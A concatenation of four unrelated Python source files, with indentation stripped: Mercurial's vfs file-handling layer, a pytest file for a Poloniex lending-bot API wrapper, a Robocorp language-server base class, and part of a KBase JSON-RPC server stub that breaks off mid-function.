def readdir(self, path=None, stat=None, skip=None):
return util.listdir(self.join(path), stat, skip)
def readlock(self, path):
return util.readlock(self.join(path))
def rename(self, src, dst, checkambig=False):
"""Rename from src to dst
checkambig argument is used with util.filestat, and is useful
only if destination file is guarded by any lock
(e.g. repo.lock or repo.wlock).
To avoid file stat ambiguity forcibly, checkambig=True involves
copying ``src`` file, if it is owned by another. Therefore, use
checkambig=True only in limited cases (see also issue5418 and
issue5584 for detail).
"""
srcpath = self.join(src)
dstpath = self.join(dst)
oldstat = checkambig and util.filestat.frompath(dstpath)
if oldstat and oldstat.stat:
ret = util.rename(srcpath, dstpath)
_avoidambig(dstpath, oldstat)
return ret
return util.rename(srcpath, dstpath)
def readlink(self, path):
return util.readlink(self.join(path))
def removedirs(self, path=None):
"""Remove a leaf directory and all empty intermediate ones
"""
return util.removedirs(self.join(path))
def rmdir(self, path=None):
"""Remove an empty directory."""
return os.rmdir(self.join(path))
def rmtree(self, path=None, ignore_errors=False, forcibly=False):
"""Remove a directory tree recursively
If ``forcibly``, this tries to remove READ-ONLY files, too.
"""
if forcibly:
def onerror(function, path, excinfo):
if function is not os.remove:
raise
# read-only files cannot be unlinked under Windows
s = os.stat(path)
if (s.st_mode & stat.S_IWRITE) != 0:
raise
os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
os.remove(path)
else:
onerror = None
return shutil.rmtree(self.join(path),
ignore_errors=ignore_errors, onerror=onerror)
def setflags(self, path, l, x):
return util.setflags(self.join(path), l, x)
def stat(self, path=None):
return os.stat(self.join(path))
def unlink(self, path=None):
return util.unlink(self.join(path))
def tryunlink(self, path=None):
"""Attempt to remove a file, ignoring missing file errors."""
util.tryunlink(self.join(path))
def unlinkpath(self, path=None, ignoremissing=False, rmdir=True):
return util.unlinkpath(self.join(path), ignoremissing=ignoremissing,
rmdir=rmdir)
def utime(self, path=None, t=None):
return os.utime(self.join(path), t)
def walk(self, path=None, onerror=None):
"""Yield (dirpath, dirs, files) tuple for each directories under path
``dirpath`` is relative one from the root of this vfs. This
uses ``os.sep`` as path separator, even you specify POSIX
style ``path``.
"The root of this vfs" is represented as empty ``dirpath``.
"""
root = os.path.normpath(self.join(None))
# when dirpath == root, dirpath[prefixlen:] becomes empty
# because len(dirpath) < prefixlen.
prefixlen = len(pathutil.normasprefix(root))
for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
yield (dirpath[prefixlen:], dirs, files)
@contextlib.contextmanager
def backgroundclosing(self, ui, expectedcount=-1):
"""Allow files to be closed asynchronously.
When this context manager is active, ``backgroundclose`` can be passed
to ``__call__``/``open`` to result in the file possibly being closed
asynchronously, on a background thread.
"""
# Sharing backgroundfilecloser between threads is complex, and using
# multiple instances puts us at risk of running out of file descriptors;
# only allow use of backgroundfilecloser when in the main thread.
if not isinstance(threading.currentThread(), threading._MainThread):
yield
return
vfs = getattr(self, 'vfs', self)
if getattr(vfs, '_backgroundfilecloser', None):
raise error.Abort(
_('can only have 1 active background file closer'))
with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
try:
vfs._backgroundfilecloser = bfc
yield bfc
finally:
vfs._backgroundfilecloser = None
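# Usage sketch (illustrative only, not part of upstream Mercurial): the
# backgroundclosing() context manager is intended to pair with
# ``backgroundclose=True`` on the individual writes, e.g.
#
#   with somevfs.backgroundclosing(ui, expectedcount=len(files)):
#       for name, data in files:
#           somevfs.write(name, data, backgroundclose=True)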
class vfs(abstractvfs):
'''Operate files relative to a base directory
This class is used to hide the details of COW semantics and
remote file access from higher level code.
'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
(b) the base directory is managed by hg and considered sort-of append-only.
See pathutil.pathauditor() for details.
'''
def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
realpath=False):
if expandpath:
base = util.expandpath(base)
if realpath:
base = os.path.realpath(base)
self.base = base
self._audit = audit
if audit:
self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
else:
self.audit = (lambda path, mode=None: True)
self.createmode = None
self._trustnlink = None
@util.propertycache
def _cansymlink(self):
return util.checklink(self.base)
@util.propertycache
def _chmod(self):
return util.checkexec(self.base)
def _fixfilemode(self, name):
if self.createmode is None or not self._chmod:
return
os.chmod(name, self.createmode & 0o666)
def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
backgroundclose=False, checkambig=False, auditpath=True):
'''Open ``path`` file, which is relative to vfs root.
Newly created directories are marked as "not to be indexed by
the content indexing service", if ``notindexed`` is specified
for "write" mode access.
If ``backgroundclose`` is passed, the file may be closed asynchronously.
It can only be used if the ``self.backgroundclosing()`` context manager
is active. This should only be specified if the following criteria hold:
1. There is a potential for writing thousands of files. Unless you
are writing thousands of files, the performance benefits of
asynchronously closing files are not realized.
2. Files are opened exactly once for the ``backgroundclosing``
active duration and are therefore free of race conditions between
closing a file on a background thread and reopening it. (If the
file were opened multiple times, there could be unflushed data
because the original file handle hasn't been flushed/closed yet.)
``checkambig`` argument is passed to atomictempfile (valid
only for writing), and is useful only if target file is
guarded by any lock (e.g. repo.lock or repo.wlock).
To avoid file stat ambiguity forcibly, checkambig=True involves
copying ``path`` file opened in "append" mode (e.g. for
truncation), if it is owned by another. Therefore, use
combination of append mode and checkambig=True only in limited
cases (see also issue5418 and issue5584 for detail).
'''
if auditpath:
if self._audit:
r = util.checkosfilename(path)
if r:
raise error.Abort("%s: %r" % (r, path))
self.audit(path, mode=mode)
f = self.join(path)
if "b" not in mode:
mode += "b" # for that other OS
nlink = -1
if mode not in ('r', 'rb'):
dirname, basename = util.split(f)
# If basename is empty, then the path is malformed because it points
# to a directory. Let the posixfile() call below raise IOError.
if basename:
if atomictemp:
util.makedirs(dirname, self.createmode, notindexed)
return util.atomictempfile(f, mode, self.createmode,
checkambig=checkambig)
try:
if 'w' in mode:
util.unlink(f)
nlink = 0
else:
# nlinks() may behave differently for files on Windows
# shares if the file is open.
with util.posixfile(f):
nlink = util.nlinks(f)
if nlink < 1:
nlink = 2 # force mktempcopy (issue1922)
except (OSError, IOError) as e:
if e.errno != errno.ENOENT:
raise
nlink = 0
util.makedirs(dirname, self.createmode, notindexed)
if nlink > 0:
if self._trustnlink is None:
self._trustnlink = nlink > 1 or util.checknlink(f)
if nlink > 1 or not self._trustnlink:
util.rename(util.mktempcopy(f), f)
fp = util.posixfile(f, mode)
if nlink == 0:
self._fixfilemode(f)
if checkambig:
if mode in ('r', 'rb'):
raise error.Abort(_('implementation error: mode %s is not'
' valid for checkambig=True') % mode)
fp = checkambigatclosing(fp)
if (backgroundclose and
isinstance(threading.currentThread(), threading._MainThread)):
if not self._backgroundfilecloser:
raise error.Abort(_('backgroundclose can only be used when a '
'backgroundclosing context manager is active')
)
fp = delayclosedfile(fp, self._backgroundfilecloser)
return fp
def symlink(self, src, dst):
self.audit(dst)
linkname = self.join(dst)
util.tryunlink(linkname)
util.makedirs(os.path.dirname(linkname), self.createmode)
if self._cansymlink:
try:
os.symlink(src, linkname)
except OSError as err:
raise OSError(err.errno, _('could not symlink to %r: %s') %
(src, encoding.strtolocal(err.strerror)),
linkname)
else:
self.write(dst, src)
def join(self, path, *insidef):
if path:
return os.path.join(self.base, path, *insidef)
else:
return self.base
opener = vfs
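# Usage sketch (illustrative only, not part of upstream Mercurial): a vfs
# reads and writes paths relative to its base directory, e.g.
#
#   myvfs = vfs('/tmp/example', audit=False)
#   myvfs.write('notes/todo.txt', b'hello')          # parent dirs created as needed
#   assert myvfs.read('notes/todo.txt') == b'hello'
#   assert myvfs.tryread('missing.txt') == ""        # missing files read as ""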
class proxyvfs(object):
def __init__(self, vfs):
self.vfs = vfs
@property
def options(self):
return self.vfs.options
@options.setter
def options(self, value):
self.vfs.options = value
class filtervfs(abstractvfs, proxyvfs):
'''Wrapper vfs for filtering filenames with a function.'''
def __init__(self, vfs, filter):
proxyvfs.__init__(self, vfs)
self._filter = filter
def __call__(self, path, *args, **kwargs):
return self.vfs(self._filter(path), *args, **kwargs)
def join(self, path, *insidef):
if path:
return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
else:
return self.vfs.join(path)
filteropener = filtervfs
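# Usage sketch (illustrative only, not part of upstream Mercurial): filtervfs
# mangles each filename with the supplied function before delegating to the
# wrapped vfs, e.g. forcing every path under a prefix:
#
#   inner = vfs('/tmp/store', audit=False)
#   prefixed = filtervfs(inner, lambda p: 'data/' + p)
#   prefixed.write('foo', b'x')   # actually writes /tmp/store/data/foo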
class readonlyvfs(abstractvfs, proxyvfs):
'''Wrapper vfs preventing any writing.'''
def __init__(self, vfs):
proxyvfs.__init__(self, vfs)
def __call__(self, path, mode='r', *args, **kw):
if mode not in ('r', 'rb'):
raise error.Abort(_('this vfs is read only'))
return self.vfs(path, mode, *args, **kw)
def join(self, path, *insidef):
return self.vfs.join(path, *insidef)
class closewrapbase(object):
"""Base class of wrapper, which hooks closing
Do not instantiate outside of the vfs layer.
"""
def __init__(self, fh):
object.__setattr__(self, r'_origfh', fh)
def __getattr__(self, attr):
return getattr(self._origfh, attr)
def __setattr__(self, attr, value):
return setattr(self._origfh, attr, value)
def __delattr__(self, attr):
return delattr(self._origfh, attr)
def __enter__(self):
self._origfh.__enter__()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
raise NotImplementedError('attempted instantiating ' + str(type(self)))
def close(self):
raise NotImplementedError('attempted instantiating ' + str(type(self)))
class delayclosedfile(closewrapbase):
"""Proxy for a file object whose close is delayed.
Do not instantiate outside of the vfs layer.
"""
def __init__(self, fh, closer):
super(delayclosedfile, self).__init__(fh)
object.__setattr__(self, r'_closer', closer)
def __exit__(self, exc_type, exc_value, exc_tb):
self._closer.close(self._origfh)
def close(self):
self._closer.close(self._origfh)
class backgroundfilecloser(object):
"""Coordinates background closing of file handles on multiple threads."""
def __init__(self, ui, expectedcount=-1):
self._running = False
self._entered = False
self._threads = []
self._threadexception = None
# Only Windows/NTFS has slow file closing. So only enable by default
# on that platform. But allow to be enabled elsewhere for testing.
defaultenabled = pycompat.iswindows
enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
if not enabled:
return
# There is overhead to starting and stopping the background threads.
# Don't do background processing unless the file count is large enough
# to justify it.
minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
# FUTURE dynamically start background threads after minfilecount closes.
# (We don't currently have any callers that don't know their file count)
if expectedcount > 0 and expectedcount < minfilecount:
return
maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
threadcount = ui.configint('worker', 'backgroundclosethreadcount')
ui.debug('starting %d threads for background file closing\n' %
threadcount)
self._queue = pycompat.queue.Queue(maxsize=maxqueue)
self._running = True
for i in range(threadcount):
t = threading.Thread(target=self._worker, name='backgroundcloser')
self._threads.append(t)
t.start()
def __enter__(self):
self._entered = True
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self._running = False
# Wait for threads to finish closing so open files don't linger for
# longer than lifetime of context manager.
for t in self._threads:
t.join()
def _worker(self):
"""Main routine for worker thread."""
while True:
try:
fh = self._queue.get(block=True, timeout=0.100)
# Need to catch exceptions here or the thread will terminate and
# we could orphan file descriptors.
try:
fh.close()
except Exception as e:
# Stash so can re-raise from main thread later.
self._threadexception = e
except pycompat.queue.Empty:
if not self._running:
break
def close(self, fh):
"""Schedule a file for closing."""
if not self._entered:
raise error.Abort(_('can only call close() when context manager '
'active'))
# If a background thread encountered an exception, raise now so we fail
# fast. Otherwise we may potentially go on for minutes until the error
# is acted on.
if self._threadexception:
e = self._threadexception
self._threadexception = None
raise e
# If we're not actively running, close synchronously.
if not self._running:
fh.close()
return
self._queue.put(fh, block=True, timeout=None)
class checkambigatclosing(closewrapbase):
"""Proxy for a file object, to avoid ambiguity of file stat
See also util.filestat for detail about "ambiguity of file stat".
This proxy is useful only if the target file is guarded by any
lock (e.g. repo.lock or repo.wlock)
Do not instantiate outside of the vfs layer.
"""
def __init__(self, fh):
super(checkambigatclosing, self).__init__(fh)
object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
def _checkambig(self):
oldstat = self._oldstat
if oldstat.stat:
_avoidambig(self._origfh.name, oldstat)
def __exit__(self, exc_type, exc_value, exc_tb):
self._origfh.__exit__(exc_type, exc_value, exc_tb)
self._checkambig()
def close(self):
self._origfh.close()
self._checkambig()
|
test_PoloniexAPI.py
|
import time
import threading
# Hack to get relative imports - probably need to fix the dir structure instead but we need this at the minute for
# pytest to work
import os
import sys
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
from coinlendingbot.Poloniex import Poloniex # nopep8
import coinlendingbot.Configuration as Config # nopep8
import coinlendingbot.Data as Data # nopep8
Config.init(open('poloniex_test.cfg'), Data)
api = Poloniex(Config, None)
start_time = time.time()  # reference point for the timing printout below
def test_ticker():
ticker = api.return_ticker()
assert ticker['BTC_XMR']['lowestAsk']
def test_open_loan_offers():
offers = api.return_open_loan_offers()
assert offers is not None
def multiple_api_queries(n):
try:
for i in range(n):
print("Thread {}".format(i + 1))
thread1 = threading.Thread(target=call_get_open_loan_offers, args=[(i+1)])
thread1.start()
except Exception as e:
assert False, 'api_query ' + str(i + 1) + ': ' + str(e)
# Test fast api calls
def test_multiple_calls():
multiple_api_queries(270)
def call_get_open_loan_offers(i):
api.return_open_loan_offers()
print("API Call {} sec: {} - {}".format(i, time.time(), start_time))
|
python_ls.py
|
# Original work Copyright 2017 Palantir Technologies, Inc. (MIT)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
from robocorp_ls_core.robotframework_log import get_logger
from robocorp_ls_core.protocols import IConfig, IWorkspace
from typing import Optional
import socketserver
import threading
from robocorp_ls_core.jsonrpc.dispatchers import MethodDispatcher
from robocorp_ls_core.jsonrpc.endpoint import Endpoint
from robocorp_ls_core.jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from robocorp_ls_core import uris
from robocorp_ls_core.watchdog_wrapper import IFSObserver
from robocorp_ls_core.options import DEFAULT_TIMEOUT, USE_TIMEOUTS, NO_TIMEOUT
log = get_logger(__name__)
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile) # noqa
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == "nt":
# Catch and pass on ConnectionResetError when parent process
# dies
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
self.SHUTDOWN_CALL() # noqa
class _DummyStdin(object):
def __init__(self, original_stdin=sys.stdin, *args, **kwargs):
try:
self.encoding = sys.stdin.encoding
except:
# Not sure if it's available in all Python versions...
pass
self.original_stdin = original_stdin
try:
self.errors = (
sys.stdin.errors
) # Who knew? sys streams have an errors attribute!
except:
# Not sure if it's available in all Python versions...
pass
def readline(self, *args, **kwargs):
return "\n"
def read(self, *args, **kwargs):
return self.readline()
def write(self, *args, **kwargs):
pass
def flush(self, *args, **kwargs):
pass
def close(self, *args, **kwargs):
pass
def binary_stdio():
"""Construct binary stdio streams (not text mode).
This seems to be different for Windows/Unix and Python 2/3, so going by:
https://stackoverflow.com/questions/2850893/reading-binary-data-from-stdin
"""
PY3K = sys.version_info >= (3, 0)
if PY3K:
stdin, stdout = sys.stdin.buffer, sys.stdout.buffer
else:
# Python 2 on Windows opens sys.stdin in text mode, and
# binary data read from it becomes corrupted on \r\n
if sys.platform == "win32":
# set sys.stdin to binary mode
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
stdin, stdout = sys.stdin, sys.stdout
sys.stdin, sys.stdout = (_DummyStdin(), open(os.devnull, "w"))
return stdin, stdout
def start_tcp_lang_client(host, port, handler_class):
import socket as socket_module
if not issubclass(handler_class, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
log.info("Connecting to %s:%s", host, port)
s = socket_module.socket(socket_module.AF_INET, socket_module.SOCK_STREAM)
# Set TCP keepalive on an open socket.
# It activates after 1 second (TCP_KEEPIDLE,) of idleness,
# then sends a keepalive ping once every 3 seconds (TCP_KEEPINTVL),
# and closes the connection after 5 failed ping (TCP_KEEPCNT), or 15 seconds
try:
s.setsockopt(socket_module.SOL_SOCKET, socket_module.SO_KEEPALIVE, 1)
except (AttributeError, OSError):
pass # May not be available everywhere.
try:
s.setsockopt(socket_module.IPPROTO_TCP, socket_module.TCP_KEEPIDLE, 1)
except (AttributeError, OSError):
pass # May not be available everywhere.
try:
s.setsockopt(socket_module.IPPROTO_TCP, socket_module.TCP_KEEPINTVL, 3)
except (AttributeError, OSError):
pass # May not be available everywhere.
try:
s.setsockopt(socket_module.IPPROTO_TCP, socket_module.TCP_KEEPCNT, 5)
except (AttributeError, OSError):
pass # May not be available everywhere.
try:
# 10 seconds default timeout
s.settimeout(DEFAULT_TIMEOUT if USE_TIMEOUTS else NO_TIMEOUT)
s.connect((host, port))
s.settimeout(None) # no timeout after connected
log.info("Connected.")
except:
log.exception("Could not connect to %s: %s", host, port)
raise
log.info(
"Starting %s IO language server. pid: %s", handler_class.__name__, os.getpid()
)
rfile = s.makefile("rb")
wfile = s.makefile("wb")
server = handler_class(rfile, wfile)
server.start()
def start_tcp_lang_server(
bind_addr, port, handler_class, after_bind=lambda server: None
):
"""
:param bind_addr:
:param port:
:param handler_class:
:param after_bind:
Called right after server.bind (so, it's possible to get the port with
server.socket.getsockname() if port 0 was passed).
"""
def create_handler(_, *args, **kwargs):
method_dispatcher = handler_class(*args, **kwargs)
if not isinstance(method_dispatcher, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
return method_dispatcher
def shutdown_server(*args):
log.debug("Shutting down server")
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + "Handler",
(_StreamHandlerWrapper,),
{"DELEGATE_CLASS": create_handler, "SHUTDOWN_CALL": shutdown_server},
)
server = socketserver.TCPServer(
(bind_addr, port), wrapper_class, bind_and_activate=False
)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
after_bind(server)
log.info(
"Serving %s on (%s, %s) - pid: %s",
handler_class.__name__,
bind_addr,
port,
os.getpid(),
)
server.serve_forever()
finally:
log.info("Shutting down")
server.server_close()
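# Usage sketch (illustrative only): passing port 0 lets the OS choose a free
# port, and ``after_bind`` is where it becomes known, e.g.
#
#   start_tcp_lang_server(
#       "127.0.0.1", 0, PythonLanguageServer,
#       after_bind=lambda server: log.info(
#           "Bound to port %s", server.socket.getsockname()[1]),
#   )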
def start_io_lang_server(rfile, wfile, handler_class):
if not issubclass(handler_class, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
log.info(
"Starting %s IO language server. pid: %s", handler_class.__name__, os.getpid()
)
server = handler_class(rfile, wfile)
server.start()
class PythonLanguageServer(MethodDispatcher):
"""Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
Based on: https://github.com/palantir/python-language-server/blob/develop/pyls/python_ls.py
"""
def __init__(self, read_stream, write_stream):
from robocorp_ls_core.lsp import LSPMessages
self._config: IConfig = self._create_config()
self._workspace: Optional[IWorkspace] = None
self.root_uri = None
self.watching_thread = None
self.uri_workspace_mapper = {}
self._jsonrpc_stream_reader = JsonRpcStreamReader(read_stream)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(write_stream)
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write)
self._lsp_messages = LSPMessages(self._endpoint)
self._shutdown = False
@property
def workspace(self) -> Optional[IWorkspace]:
return self._workspace
@workspace.setter
def workspace(self, workspace: IWorkspace) -> None:
self._workspace = workspace
self._config.set_workspace_dir(workspace.root_path)
self._on_workspace_set(workspace)
def _on_workspace_set(self, workspace: IWorkspace):
pass
@property # i.e.: read-only
def config(self) -> IConfig:
return self._config
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def m_shutdown(self, **_kwargs):
self._shutdown = True
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
# If there's someone reading, we could deadlock here.
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def capabilities(self):
return {} # Subclasses should override for capabilities.
def m_initialize(
self,
processId=None,
rootUri=None,
rootPath=None,
initializationOptions=None,
workspaceFolders=None,
**_kwargs,
) -> dict:
from robocorp_ls_core.basic import exit_when_pid_exists
from robocorp_ls_core.lsp import WorkspaceFolder
log.debug(
"Language server initialized with:\n processId: %s\n rootUri: %s\n rootPath: %s\n initializationOptions: %s\n workspaceFolders: %s",
processId,
rootUri,
rootPath,
initializationOptions,
workspaceFolders,
)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ""
self.root_uri = rootUri
if workspaceFolders:
workspaceFolders = [WorkspaceFolder(**w) for w in workspaceFolders]
self.workspace = self._create_workspace(
rootUri, self._obtain_fs_observer(), workspaceFolders or []
)
if processId not in (None, -1, 0):
exit_when_pid_exists(processId)
# Get our capabilities
return {"capabilities": self.capabilities()}
def _obtain_fs_observer(self) -> IFSObserver:
"""
The FSObserver is needed to keep the list of files updated in the
Workspace (_VirtualFS).
"""
try:
return self._observer
except AttributeError:
from robocorp_ls_core import watchdog_wrapper
self._observer = watchdog_wrapper.create_observer("dummy", None)
return self._observer
def _create_config(self) -> IConfig:
raise NotImplementedError(f"Not implemented in: {self.__class__}")
def _create_workspace(
self, root_uri: str, fs_observer: IFSObserver, workspace_folders
) -> IWorkspace:
from robocorp_ls_core.workspace import Workspace
return Workspace(root_uri, fs_observer, workspace_folders)
def m_initialized(self, **_kwargs):
pass
def lint(self, doc_uri, is_saved):
raise NotImplementedError(
"Subclasses must override (current class: %s)." % (self.__class__,)
)
def cancel_lint(self, doc_uri):
raise NotImplementedError(
"Subclasses must override (current class: %s)." % (self.__class__,)
)
def m_text_document__did_close(self, textDocument=None, **_kwargs) -> None:
ws = self.workspace
doc_uri = textDocument["uri"]
if ws is not None:
ws.remove_document(doc_uri)
self.cancel_lint(doc_uri)
def m_text_document__did_open(self, textDocument=None, **_kwargs) -> None:
from robocorp_ls_core.lsp import TextDocumentItem
ws = self.workspace
if ws is not None:
ws.put_document(TextDocumentItem(**textDocument))
self.lint(textDocument["uri"], is_saved=True)
def m_text_document__did_change(
self, contentChanges=None, textDocument=None, **_kwargs
):
from robocorp_ls_core.lsp import TextDocumentItem
from robocorp_ls_core.lsp import TextDocumentContentChangeEvent
if contentChanges:
text_document_item = TextDocumentItem(**textDocument)
for change in contentChanges:
try:
range = change.get("range", None)
range_length = change.get("rangeLength", 0)
text = change.get("text", "")
self.workspace.update_document(
text_document_item,
TextDocumentContentChangeEvent(
range=range, rangeLength=range_length, text=text
),
)
except:
log.exception(
"Error updating document: %s with changes: %s"
% (textDocument, contentChanges)
)
self.lint(textDocument["uri"], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument["uri"], is_saved=True)
def m_workspace__did_change_configuration(self, settings=None) -> None:
self.config.update(settings or {})
def m_workspace__did_change_workspace_folders(self, event=None):
"""Adds/Removes folders from the workspace."""
from robocorp_ls_core.lsp import WorkspaceFolder
log.info(f"Workspace folders changed: {event}")
added_folders = []
removed_folders = []
if event:
added_folders = event.get("added", [])
removed_folders = event.get("removed", [])
for f_add in added_folders:
self.workspace.add_folder(WorkspaceFolder(**f_add))
for f_remove in removed_folders:
self.workspace.remove_folder(f_remove["uri"])
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
pass
|
contact_mappingServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from contact_mapping.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'contact_mapping'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from contact_mapping.contact_mappingImpl import contact_mapping # noqa @IgnorePep8
impl_contact_mapping = contact_mapping(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
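# Illustrative only: the custom encoder makes set-valued results JSON
# serializable, e.g.
#   json.dumps({"ids": {1, 2}}, cls=JSONObjectEncoder)
# produces a JSON list for the set (element order is not guaranteed).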
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
